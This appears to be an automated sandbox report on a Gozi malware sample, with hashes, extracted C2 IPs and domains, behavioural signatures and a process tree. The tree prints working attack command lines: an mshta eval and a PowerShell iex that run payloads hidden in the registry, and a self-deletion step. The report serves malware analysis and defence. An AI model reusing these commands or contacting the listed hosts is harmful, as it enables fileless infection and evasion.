Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
03-10-2023 11:56
Static task
static1
Behavioral task
behavioral1
Sample
client.exe
Resource
win7-20230831-en
General
-
Target
client.exe
-
Size
294KB
-
MD5
bb35f8c1a3236ad31c754cdfe795d57f
-
SHA1
b744f8ae31e2b3f7c3b72b9615823a3a3ad02989
-
SHA256
5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2
-
SHA512
fcb8f4458b7a5a4a2536a22ad55e4564ffe3d3327e4eefca10a30bc490ae29c8cc31760e07d567de53150090c84bb171209f1f3811f22d3f69545beb15edd0b0
-
SSDEEP
3072:4e6lIjmvg7aaCIg0JHk8D8uNhUqHAMMQKL2H/NHIS:4blIavYaaCIg6h/NhUDAHlH
Malware Config
Extracted
gozi
Extracted
gozi
5050
185.247.184.139
62.72.33.155
incontroler.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
expirew.com
whofos.com
onlinepoints.online
onlinepoints.top
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 4720 set thread context of 3188 4720 powershell.exe Explorer.EXE PID 3188 set thread context of 3752 3188 Explorer.EXE RuntimeBroker.exe PID 3188 set thread context of 4092 3188 Explorer.EXE RuntimeBroker.exe PID 3188 set thread context of 5100 3188 Explorer.EXE RuntimeBroker.exe PID 3188 set thread context of 4624 3188 Explorer.EXE RuntimeBroker.exe PID 3188 set thread context of 668 3188 Explorer.EXE cmd.exe PID 3188 set thread context of 4232 3188 Explorer.EXE cmd.exe PID 668 set thread context of 3828 668 cmd.exe PING.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4304 3516 WerFault.exe client.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 3828 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
client.exepowershell.exeExplorer.EXEpid process 3516 client.exe 3516 client.exe 4720 powershell.exe 4720 powershell.exe 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3188 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 4720 powershell.exe 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 668 cmd.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 4720 powershell.exe Token: SeShutdownPrivilege 3188 Explorer.EXE Token: SeCreatePagefilePrivilege 3188 Explorer.EXE Token: SeShutdownPrivilege 3188 Explorer.EXE Token: SeCreatePagefilePrivilege 3188 Explorer.EXE Token: SeShutdownPrivilege 3188 Explorer.EXE Token: SeCreatePagefilePrivilege 3188 Explorer.EXE Token: SeShutdownPrivilege 3188 Explorer.EXE Token: SeCreatePagefilePrivilege 3188 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3188 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3188 Explorer.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 4472 wrote to memory of 4720 4472 mshta.exe powershell.exe PID 4472 wrote to memory of 4720 4472 mshta.exe powershell.exe PID 4720 wrote to memory of 5088 4720 powershell.exe csc.exe PID 4720 wrote to memory of 5088 4720 powershell.exe csc.exe PID 5088 wrote to memory of 1740 5088 csc.exe cvtres.exe PID 5088 wrote to memory of 1740 5088 csc.exe cvtres.exe PID 4720 wrote to memory of 4680 4720 powershell.exe csc.exe PID 4720 wrote to memory of 4680 4720 powershell.exe csc.exe PID 4680 wrote to memory of 1844 4680 csc.exe cvtres.exe PID 4680 wrote to memory of 1844 4680 csc.exe cvtres.exe PID 4720 wrote to memory of 3188 4720 powershell.exe Explorer.EXE PID 4720 wrote to memory of 3188 4720 powershell.exe Explorer.EXE PID 4720 wrote to memory of 3188 4720 powershell.exe Explorer.EXE PID 4720 wrote to memory of 3188 4720 powershell.exe Explorer.EXE PID 3188 wrote to memory of 3752 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 3752 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 3752 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 3752 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 4092 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 4092 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 4092 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 4092 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 5100 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 5100 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 5100 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 5100 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 4624 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 4624 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 4624 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 4624 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 668 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 668 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 668 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 4232 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 4232 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 4232 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 4232 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 668 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 668 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 4232 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 4232 3188 Explorer.EXE cmd.exe PID 668 wrote to memory of 3828 668 cmd.exe PING.EXE PID 668 wrote to memory of 3828 668 cmd.exe PING.EXE PID 668 wrote to memory of 3828 668 cmd.exe PING.EXE PID 668 wrote to memory of 3828 668 cmd.exe PING.EXE PID 668 wrote to memory of 3828 668 cmd.exe PING.EXE
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3752
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5100
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4092
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Users\Admin\AppData\Local\Temp\client.exe"C:\Users\Admin\AppData\Local\Temp\client.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3516 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 4723⤵
- Program crash
PID:4304 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cdur='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cdur).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9\\\MemoryLocal'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name duamtwx -value gp; new-alias -name buypujjgfp -value iex; buypujjgfp ([System.Text.Encoding]::ASCII.GetString((duamtwx "HKCU:Software\AppDataLow\Software\Microsoft\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9").ProcessActive))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4pgn2ost\4pgn2ost.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES179A.tmp" "c:\Users\Admin\AppData\Local\Temp\4pgn2ost\CSC562B8919A0664895B7D3A6EC1B19C07A.TMP"5⤵PID:1740
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a0haxkrl\a0haxkrl.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1865.tmp" "c:\Users\Admin\AppData\Local\Temp\a0haxkrl\CSCD5BB7AA5BA1C4E7680BBA7DBCC8390F6.TMP"5⤵PID:1844
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3828 -
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:4232
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3516 -ip 35161⤵PID:4620
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD531b7d8b32742869edbd117064fd75b66
SHA1f0e011f454fdb927566d64496b0cad4f3135c81d
SHA256234e59629d060c72cc67a34d992a9be7647a77d71409d09e7599b79bcb11b75d
SHA512694f1cf26ed500874039962bf454ce2be293830341fb1e0687a4e267c31644274aad9b162d044db96bc3890cfb0478b302bba1e1009aef42fdefd0d7b3f3d5ae
-
Filesize
1KB
MD500b75c5d59872be11253e22845041c7c
SHA181f0274f05f95f6c8f1bcd4c62d7bf005ff49fe9
SHA25679258f8fa1793a74f1e82a695715c9a82674c5a884c9b89e292aea984bceff1b
SHA512c0ef719457345474cc405c4cd32fc0805fcd8e20be0814e4b8c5dd0c336ef600f573efc264e22bc4bdc73aa8f10afab574ad943af063f343a8edc78139aefc54
-
Filesize
1KB
MD5a72a6ab4ce6a54a5003d7b2a6b7f46ad
SHA1bff2ffa19b218456c8cbfe9e968793f80c62c5f6
SHA2562fcc700eaec2a42280a94c3c4eed05b2742e07892f179a43c3f70f18babd0442
SHA5126a19e916b361d430e83c5a59879cdcfd421907017803517aac98639967f1430594f49174df771b9225ae800da3437365c48618f7f7ec545fb0f6e5ad49f623d9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD524a4669e73544c1da94d4e1b72280838
SHA18b9473b4950d2c30a4f8ec401de42d63c9e4b8f6
SHA256168e1c9e3193cdfea6834f9286e93fd61d50080f049dcf1218895d62f57c485a
SHA5125c5036b858ba5fcb81eef6375aa73cc6ace4a617854ad62733764f2f2c8c1db32fe702972f3ef9ed018d7f1c6f62de599f5d5cbc05a2aa10fc8e696084eb9d8e
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
369B
MD50cecbd03ebec9c35035e5012b05f63b0
SHA1eaf5772c20721fd34c522fb60fcf9e58b975ef40
SHA256b94c5378191eb82b90e9b3bfb4919728aa441233a68b17b242847a2ff48a840d
SHA5120b082c80ff1d6f559a8da55bb6e8a38cf6f86cfad656c09d323e1aec47b08672ecd5697f8bffd52ae3d5131ed3ca1adbbf44078efa897529bfc4d7af73d9c755
-
Filesize
652B
MD55b889b923901c4606ba9205b40b11258
SHA112a9a2b2a6a78fbfd6cfd3d66372480e924b0797
SHA256db5b28302c195e3a8a2916b19fa12cbc9feae9358707f14d3f88066696068d89
SHA512761505deef3e73b6f4369bd2bd0498238581c2020eb8e2a2d996b69e073a5ef8494e3daa700a97932994a43b1f72984751a7b01b71610afd0d19daab9f9ebe01
-
Filesize
652B
MD5bc18152d556b640d9d0a30153f0a9380
SHA1f9a090fd2956c570187b8893faaae4afee410e03
SHA2566b21412d9132fa4d8ffcc94fa06e440559cc0bf52c250fa625004292936f08b6
SHA512e2527a0ca87ce3eb43d9d784d285b512c492cb94240ac1de256f1902a1c2ba73e97a901f9460a92b8c0e7cf7acc4f786b9be4717ba43d013f7318ace0899f1dc
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
369B
MD5ad8dd2b9205dd63cce016a9328660580
SHA176cb1d19791c9867fe63f9d20c47b1175affbf39
SHA25654ccecb3a172be2a04a3e72a7d09783e8fd32e64ead2296abf3f7cb1c60c26d4
SHA512ff47166f6d85ec08e3d00906d0bb6b761b547f4d60af9baa7dc8b7e47cad32ef80b1a6438040e0b3a8fdd787ab426c6df655a16cc4f6bc1f3c593a32e3a62d59